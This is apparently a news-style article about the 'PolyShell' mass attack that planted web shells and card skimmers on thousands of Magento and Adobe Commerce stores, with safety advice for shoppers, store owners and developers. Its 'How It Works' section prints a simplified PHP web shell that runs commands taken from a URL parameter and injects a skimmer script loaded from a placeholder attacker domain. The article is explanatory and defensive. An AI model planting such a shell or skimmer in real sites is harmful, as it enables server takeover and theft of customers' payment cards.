7,500 Stores Hit: The 'PolyShell' Attack Targeting Your Credit Card Data

Your credit card data might be on a hacker’s server right now.

If you bought anything from an independent online boutique or a niche e-commerce site in the last 24 hours, stop what you’re doing and check your bank statement. Over 7,500 websites running on Adobe Commerce and Magento were compromised overnight in a coordinated mass-exploitation event.

This isn’t just a simple website defacement. Hackers used a flaw dubbed PolyShell to bypass security filters and inject malicious scripts directly into the checkout flow.

The goal? To scrape your credit card number, CVV, and expiry date the exact moment you hit “purchase.”

What Happened

Security researchers at Sansec and other firms began tracking a massive spike in automated attacks targeting a specific file upload vulnerability. Within hours, the number of infected stores ballooned from a few dozen to several thousand.

• The Scale: Over 7,500 domains have been confirmed as compromised.
• The Target: Small to medium-sized businesses using Adobe Commerce and the open-source Magento platform.
• The Payload: Attackers are uploading “web shells”—backdoors that give them total control over the server.
• The Result: Malicious JavaScript is injected into the payment pages, a technique known as Magecart or digital skimming.

Why This Matters

Think of this like a physical card skimmer found on a gas pump, but invisible and deployed to thousands of pumps simultaneously.

Before this attack, these stores were considered “secure” because they used HTTPS. But HTTPS only protects data in transit from your computer to the server. If the server itself is compromised, the data is stolen before it even gets encrypted for the bank.

For store owners, this is a nightmare. A single breach can lead to massive fines from payment processors and a total loss of customer trust. For you, the shopper, it means your identity and financial health are on the line.

How It Works

The PolyShell vulnerability exploits how the server handles file uploads. Usually, a server checks if a file is an image (like a product photo) before saving it.

Attackers found a way to “polyglot” a file—making it look like a harmless .jpg to the security filter, while actually containing executable PHP code. Once the file is on the server, the attacker calls it via a URL, and the server executes the hidden code.

Here is a simplified example of how a malicious payload might look when hidden inside a fake image file:

<?php
// A fake JPEG header to fool basic filters
// \xFF\xD8\xFF\xE0 (Actual binary data would go here)

// The 'PolyShell' logic
if(isset($_GET['cmd'])) {
    // This line allows the hacker to run any command on the store's server
    system($_GET['cmd']); 
}

// The script then injects a skimmer into the checkout page
$skimmer = "<script src='https://cdn-malicious-stats.com/track.js'></script>";
file_put_contents('pub/static/frontend/checkout.js', $skimmer, FILE_APPEND);
?>

By appending that script to the checkout page, the attacker ensures that every time a customer enters their card details, a copy is sent to the attacker’s server at cdn-malicious-stats.com.

What to Do Next

• For Shoppers: Check your credit card statements for any unauthorized charges, even small ones ($1 or $2). If you shopped at a small online store recently, consider freezing your card and requesting a new number. Use Apple Pay, Google Pay, or PayPal whenever possible, as these methods don’t share your actual card details with the merchant.

• For Store Owners: Immediately check your server for new or suspicious files in the /media or /pub/static directories. Apply the latest security patches from Adobe (specifically addressing CVE-2024-34102 and related flaws).

• For Developers: Implement strict file-type validation that goes beyond extension checking. Use tools like Sansec eComscan to scan your codebase for injected malware and unauthorized admin accounts created during the window of exploitation.